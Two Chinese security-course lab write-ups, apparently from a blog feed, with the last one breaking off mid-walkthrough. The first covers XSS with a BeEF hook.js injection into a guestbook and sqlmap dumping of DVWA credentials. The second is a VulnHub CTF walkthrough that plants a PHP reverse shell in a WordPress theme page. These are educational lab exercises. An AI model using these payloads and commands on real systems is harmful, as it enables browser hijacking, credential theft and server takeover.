<published>2020-12-15T20:11:50.000Z</published>
<updated>2022-03-18T06:03:46.017Z</updated>
<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><p>了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><p>Kali Linux 2、Windows Server</p><h2 id="网络环境"><a href="#网络环境" class="headerlink" title="网络环境"></a>网络环境</h2><p>交换网络结构</p><h2 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>实验工具</h2><p> Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA</p><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>实验步骤</h2><h3 id="XSS部分:利用Beef劫持被攻击者客户端浏览器"><a href="#XSS部分:利用Beef劫持被攻击者客户端浏览器" class="headerlink" title="XSS部分:利用Beef劫持被攻击者客户端浏览器"></a>XSS部分:利用Beef劫持被攻击者客户端浏览器</h3><h4 id="实验环境搭建。"><a href="#实验环境搭建。" class="headerlink" title="实验环境搭建。"></a>实验环境搭建。</h4><p>角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)<br>攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);<br>被攻击者:访问留言簿网站,浏览器被劫持。</p><h4 id="搭建GustBook网站"><a href="#搭建GustBook网站" class="headerlink" title="搭建GustBook网站"></a>搭建GustBook网站</h4><p>在管理工具里打开Internet信息服务(IIS)管理器,在网站文件夹上新建网站,网站描述随意,ip地址为Windows Server的ip,端口80即可。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216012553878.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>选择路径的时候除了选取到文件夹还要注意要==允许访问匿名网站,否则检查不到漏洞==。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216013153551.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>权限给满满的。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216013315669.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>搭建完网站后更改网站目录权限,添加Everyone用户组并设置为完全控制。↓</p><p><img src="https://img-blog.csdnimg.cn/2020121601390350.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216014308226.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>然后还要改几个小选项。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216014607908.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201216014615927.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="利用AWVS扫描留言簿网站"><a href="#利用AWVS扫描留言簿网站" class="headerlink" title="利用AWVS扫描留言簿网站"></a>利用AWVS扫描留言簿网站</h4><p>破解进入软件后,点击”File”–”New”–”Web Site Scan”来启动Scan Wizard界面<br>在Scan single website中输入网址:****,点击Next…………直到出表。↓</p><p><img src="https://img-blog.csdnimg.cn/2020121602051491.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216020536116.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216020542261.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216020547270.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>最后结果如下,于error.asp和add.asp中分别有一个XSS漏洞。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216020902538.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201216020912938.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/2020121602091967.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="Kali使用beef生成恶意代码"><a href="#Kali使用beef生成恶意代码" class="headerlink" title="Kali使用beef生成恶意代码"></a>Kali使用beef生成恶意代码</h4><p>Kali-2020中现在不自带Beef,需要咱们自己安装,命令↓<br><code>sudo apt-get install beef-xss</code><br>然后进入文件夹↓<br><code>cd /usr/share/beef-xss</code><br>最后输入<code>./beef</code>就ok了。<br>第一次会提示不要用默认的账号密码的提示,我当时做完忘截图了……,不过报错提示是↓</p><p><img src="https://img-blog.csdnimg.cn/20201216024003548.jpg#pic_center" alt="在这里插入图片描述"></p><p>按照提示中的文件进行修改 <code>sudo vim /etc/beef-xss/config.yaml</code><br>(vim用法自行搜索)</p><p><img src="https://img-blog.csdnimg.cn/20201216024119857.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述"></p><p>在这里我把账号密码逆向设置,保存退出后再<code>./beef</code>。↑</p><p><strong>注</strong></p><p>这个如果是默认用户可能会导致开启失败,所以我们可以切换为root权限,再<code>./beef</code>。(如果本身就是以root开局,那就当我没说)</p><p><img src="https://img-blog.csdnimg.cn/20201216024558503.jpg#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201216024616862.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>提示已经启动了,然后我就可以用kali的火狐浏览器打开链接<code>http://127.0.0.1:3000/ui/authentication</code>。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216024727800.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>输入之前设置的账号密码,进入这个页面。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216024828390.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>查看XSS脚本。↓<br> <img src="https://img-blog.csdnimg.cn/20201216024921793.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>对方如果访问这个网站,对方的浏览器就会被劫持。</p><h4 id="访问http-x2F-x2F-留言簿网站-x2F-message-asp-将恶意代码写入网站留言板"><a href="#访问http-x2F-x2F-留言簿网站-x2F-message-asp-将恶意代码写入网站留言板" class="headerlink" title="访问http://留言簿网站/message.asp;将恶意代码写入网站留言板"></a>访问http://留言簿网站/message.asp;将恶意代码写入网站留言板</h4><p><strong>恶意代码:</strong> </p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><script src="http://Kali的IP地址:3000/hook.js"></script></span><br></pre></td></tr></table></figure><p>一开始使用10.34.80.233的那个ip是写死的,我在kali上访问不了,一开始我以为是端口的原因,我就换了个8888端口的,后来扫描发现kali和windows server不在一个网段里,查两者的网关发现两者网关都不一样。所以我就把windows server设为自动获取ip。再次<code>nmap -sP</code> ,两者在同一网段内,kali也可以访问留言簿了。</p><p><img src="https://img-blog.csdnimg.cn/20201216040223380.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>看到这个页面发现我们可以说是成功了,看不见我们的html代码表示代码已被成功加载。</p><p><img src="https://img-blog.csdnimg.cn/20201216040249939.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="审核用户留言(非严谨)"><a href="#审核用户留言(非严谨)" class="headerlink" title="审核用户留言(非严谨)"></a>审核用户留言(非严谨)</h4><p>刷新页面或者点击首页会出弹框。↓(也相当于管理员审核邮件了,但是我的beef用了几次就出问题了,就没模拟管理员审核的步骤。)</p><p><img src="https://img-blog.csdnimg.cn/20201216040641124.jpg#pic_center" alt="在这里插入图片描述"></p><p>然后我们回到kali这边发现信息已经疯狂加载,红色部分的一直在重复,我就不截图了。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216040742922.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>可以看到很多信息,我们还可以干一些“活儿”。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216040817769.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>“活儿”↓</p><p><img src="https://img-blog.csdnimg.cn/20201216040944231.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>我们按照箭头指示更改链接为:青柠起始页,并==Execute==.↑</p><p>然后我们浏览留言簿页面就会加载为青柠起始页。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216041127884.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="实验中XSS攻击属于哪种类型"><a href="#实验中XSS攻击属于哪种类型" class="headerlink" title="实验中XSS攻击属于哪种类型"></a>实验中XSS攻击属于哪种类型</h4><p>实验中的XSS攻击属于注入型XSS攻击。</p><hr><h3 id="SQL注入部分:DVWA-SQLmap-Mysql注入实战"><a href="#SQL注入部分:DVWA-SQLmap-Mysql注入实战" class="headerlink" title="SQL注入部分:DVWA+SQLmap+Mysql注入实战"></a>SQL注入部分:DVWA+SQLmap+Mysql注入实战</h3><p>实验环境搭建。启动Metasploitable2虚拟机。</p><ul><li>小准备,在Metasploitable2查一下的ip</li></ul><p>Metasploitable2里的dvwa是搭建好的,直接在kali访问 <code>http://Metasploitable的IP/dvw</code></p><p><img src="https://img-blog.csdnimg.cn/20201216221018178.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>设置DVWA Security的等级为low</p><p><img src="https://img-blog.csdnimg.cn/20201216221232322.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>第一次输入1,结果如下。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216221455186.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>第二次输入1’,结果如下。↓</p><p><img src="https://img-blog.csdnimg.cn/20201216221708590.jpg#pic_center" alt="在这里插入图片描述"></p><p>报错说明有漏洞课钻空子。↑</p><p>用sqlmap搞事情,基本语法如下:</p><ul><li>-u:指定目标URL,即注入点</li><li>–cookies:当前会话的cookies值</li><li>-b:获取数据库类型,检查数据库管理系统标识 </li><li>–current-db:获取当前数据库 </li><li>–current-user:获取当前数据库使用的用户</li><li>-string:当查询可用时来匹配页面中的字符串</li><li>-users:枚举DBMS用户</li><li>-password:枚举DBMS用户密码hash</li><li>dbs:枚举当前数据库</li><li>-D 数据库名:指定数据库</li><li>-tables:枚举指定数据库的所有表</li><li>-T:指定数据库中的数据表</li><li>–columns:获取列的信息</li><li>-C:枚举数据表中的列</li><li>–dump:存储数据表项</li></ul><h4 id="实验准备"><a href="#实验准备" class="headerlink" title="实验准备"></a>实验准备</h4><p>要用F12抓包获取cookie</p><p>==注:在遇到的所有的Y/N选择中,一直选Y就好了,三选的直接Enter。==</p><h4 id="枚举当前使用的数据库名称和用户名"><a href="#枚举当前使用的数据库名称和用户名" class="headerlink" title="枚举当前使用的数据库名称和用户名"></a>枚举当前使用的数据库名称和用户名</h4><p>查询当前数据库名称↓<br><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" --current-db</code></p><p><img src="https://img-blog.csdnimg.cn/20201216222823966.jpg#pic_center" alt="在这里插入图片描述"></p><p>查询当前数据库的使用者的用户名↓</p><p><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" --current-user</code></p><p><img src="https://img-blog.csdnimg.cn/20201216222929718.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="枚举数据库和指定数据库的数据表"><a href="#枚举数据库和指定数据库的数据表" class="headerlink" title="枚举数据库和指定数据库的数据表"></a>枚举数据库和指定数据库的数据表</h4><p>枚举数据库↓<br><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" -dbs</code></p><p><img src="https://img-blog.csdnimg.cn/20201216223127796.jpg#pic_center" alt="在这里插入图片描述"></p><p>枚举指定数据库的数据表↓<br><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" -D dvwa --tables</code></p><p><img src="https://img-blog.csdnimg.cn/20201216223001597.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="获取指定数据库和表中所有列的信息"><a href="#获取指定数据库和表中所有列的信息" class="headerlink" title="获取指定数据库和表中所有列的信息"></a>获取指定数据库和表中所有列的信息</h4><p><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" -D dvwa --tables -T users -- columns</code></p><p><img src="https://img-blog.csdnimg.cn/20201216223232909.jpg#pic_center" alt="在这里插入图片描述"></p><h4 id="枚举指定数据表中的所有用户名与密码-并down到本地"><a href="#枚举指定数据表中的所有用户名与密码-并down到本地" class="headerlink" title="枚举指定数据表中的所有用户名与密码,并down到本地"></a>枚举指定数据表中的所有用户名与密码,并down到本地</h4><p><code>sqlmap -u "http://192.168.238.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=edc3d366bb72538cb8af3df2bbf19979" -D dvwa --tables -T users -C user,password --dump</code></p><p><img src="https://img-blog.csdnimg.cn/20201216223304982.jpg#pic_center" alt="在这里插入图片描述"></p>]]></content>
<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><p>了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库</summary>
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>CTF Practice</title>
<link href="http://example.com/2020/12/15/CTF%20Practice/"/>
<id>http://example.com/2020/12/15/CTF%20Practice/</id>
<published>2020-12-15T15:11:44.000Z</published>
<updated>2022-03-18T06:03:46.012Z</updated>
<content type="html"><![CDATA[<h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><p>通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。</p><h2 id="系统环境"><a href="#系统环境" class="headerlink" title="系统环境"></a>系统环境</h2><p>Kali Linux 2、WebDeveloper靶机来源:<a href="https://www.vulnhub.com/">https://www.vulnhub.com/</a> </p><h2 id="实验工具"><a href="#实验工具" class="headerlink" title="实验工具"></a>实验工具</h2><p>不限</p><h2 id="实验步骤和内容"><a href="#实验步骤和内容" class="headerlink" title="实验步骤和内容"></a>实验步骤和内容</h2><p>目的:获取靶机Web Developer 文件文件/root/flag.txt中flag。<br>基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。<br>实施细节如下:</p><h3 id="发现目标,找到WebDeveloper的IP地址"><a href="#发现目标,找到WebDeveloper的IP地址" class="headerlink" title="发现目标,找到WebDeveloper的IP地址"></a>发现目标,找到WebDeveloper的IP地址</h3><p>简单的<code>nmap -sP</code>命令(怎么获取ip我就不发了……,前面博客有),至于怎么确定是这个ip的,除了ip排除法,就是拿链接访问网址验证。</p><p><img src="https://img-blog.csdnimg.cn/20201215154402907.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用NMAP扫描目标主机,发现目标主机端口开放、服务情况"><a href="#利用NMAP扫描目标主机,发现目标主机端口开放、服务情况" class="headerlink" title="利用NMAP扫描目标主机,发现目标主机端口开放、服务情况"></a>利用NMAP扫描目标主机,发现目标主机端口开放、服务情况</h3><p>关于扫描的命令我当时突发奇想的想到能不能多点样式,于是就用了三个命令:<br>第一个:<code>nmap</code></p><p><img src="https://img-blog.csdnimg.cn/20201215184238935.jpg#pic_center" alt="在这里插入图片描述"></p><p>第二个:<code>nmap -u</code></p><p><img src="https://img-blog.csdnimg.cn/20201215184304191.jpg#pic_center" alt="在这里插入图片描述"></p><p>第三个:<code>nmap -sS -sV -TS -A -p-</code></p><p><img src="https://img-blog.csdnimg.cn/20201215184315717.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>提供的服务:<strong>ssh</strong> 和 <strong>http</strong></p><h3 id="若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站"><a href="#若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站" class="headerlink" title="若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站"></a>若目标主机提供了HTTP服务,尝试利用浏览器访问目标网站</h3><p>没什么好说的,直接访问ip。</p><p><img src="https://img-blog.csdnimg.cn/20201215184801733.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201215184843759.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么"><a href="#利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么" class="headerlink" title="利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么"></a>利用whatweb探测目标网站使用的CMS模板并分析使用的CMS是什么</h3><p>使用命令 <code>whatweb</code></p><p><img src="https://img-blog.csdnimg.cn/20201215184933344.jpg#pic_center" alt="在这里插入图片描述"></p><p>注意图中划红线的部分,表明使用的CMS模板为<strong>WordPress</strong>。</p><h3 id="简要说明wpscan功能"><a href="#简要说明wpscan功能" class="headerlink" title="简要说明wpscan功能"></a>简要说明wpscan功能</h3><p>WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。<br><a href="https://www.freebuf.com/sectool/174663.html">详情链接</a></p><h3 id="Dirb-爆破网站使用目录,找到一个似乎和网络流量有关的目录(路径)"><a href="#Dirb-爆破网站使用目录,找到一个似乎和网络流量有关的目录(路径)" class="headerlink" title="Dirb 爆破网站使用目录,找到一个似乎和网络流量有关的目录(路径)"></a>Dirb 爆破网站使用目录,找到一个似乎和网络流量有关的目录(路径)</h3><p>命令 <code>dirb</code></p><p><img src="https://img-blog.csdnimg.cn/20201215203045612.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>通过<code>ipdata、sever-status</code>字眼判断。</p><h3 id="浏览器访问该目录(路径)"><a href="#浏览器访问该目录(路径)" class="headerlink" title="浏览器访问该目录(路径)"></a>浏览器访问该目录(路径)</h3><p>访问目录直接找到cap文件!</p><p><img src="https://img-blog.csdnimg.cn/20201215203404162.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center"></p><h3 id="用Wireshark分析该数据包,分析TCP数据流"><a href="#用Wireshark分析该数据包,分析TCP数据流" class="headerlink" title="用Wireshark分析该数据包,分析TCP数据流"></a>用Wireshark分析该数据包,分析TCP数据流</h3><p>因为登录注册这些操作都是客户发给服务器,所以我们通过<code>http.request.method == POST</code>命令筛选,再从<code>Info</code>信息段中发现<code>login</code>字眼,则直接查到账号密码。</p><p><img src="https://img-blog.csdnimg.cn/20201215205708880.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用上一步得到的信息进入网站后台"><a href="#利用上一步得到的信息进入网站后台" class="headerlink" title="利用上一步得到的信息进入网站后台"></a>利用上一步得到的信息进入网站后台</h3><p>注意我的链接 <code>/wp-login.php</code>,剩下的就是直接上号。</p><p><img src="https://img-blog.csdnimg.cn/20201215210106360.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用该CMS存在的(插件Plugin)漏洞"><a href="#利用该CMS存在的(插件Plugin)漏洞" class="headerlink" title="利用该CMS存在的(插件Plugin)漏洞"></a>利用该CMS存在的(插件Plugin)漏洞</h3><p>这个漏洞嘛,我没深研究,只是知道有这个漏洞就可以坏事了,嘿嘿嘿。</p><p><img src="https://img-blog.csdnimg.cn/20201215222415511.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="利用该插件漏洞提权"><a href="#利用该插件漏洞提权" class="headerlink" title="利用该插件漏洞提权"></a>利用该插件漏洞提权</h3><p>我们这里采用的是上传反弹shell的方法,所以我们需要一个可以反弹我们上传的shell的页面。不过在选页面之前我们先下载这个可以反弹TCP连接到攻击者的脚本,下载地址 <a href="http://pentestmonkey.net/tools/web-shells/php-reverse-shell">http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><p><img src="https://img-blog.csdnimg.cn/20201215212725790.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>下载完解压是这样</p><p><img src="https://img-blog.csdnimg.cn/20201215212746301.jpg#pic_center" alt="在这里插入图片描述"></p><p>这个php就是我们需要的,不过它还需要初始化(这个初始化你可以在本地改,或者粘贴到页面后再改,不过这里建议直接在本地初始化,这样我们后续的试验中就不用担心代码每次复制粘贴都需要初始化的困扰)</p><p><img src="https://img-blog.csdnimg.cn/2020121521300365.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>↑</strong>把ip改为攻击方,即我们自己的ip;port端口号随意改。</p><p>现在准备工作完成了,我们可以来改页面了↓</p><p>通过<strong>第9步</strong>的登录我们成功进入了后台,然后我们在左侧目录里的Appearance→Editor里随便找一个页面,一般用404界面↓</p><p><img src="https://img-blog.csdnimg.cn/202012152116354.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>把php脚本里的代码粘贴到404页面后直接点击下方的Updata File(蓝色按钮)会报错。这时就需要我们进行更改,即更改右上方的edit后再点击按钮更新文件↓</p><p><img 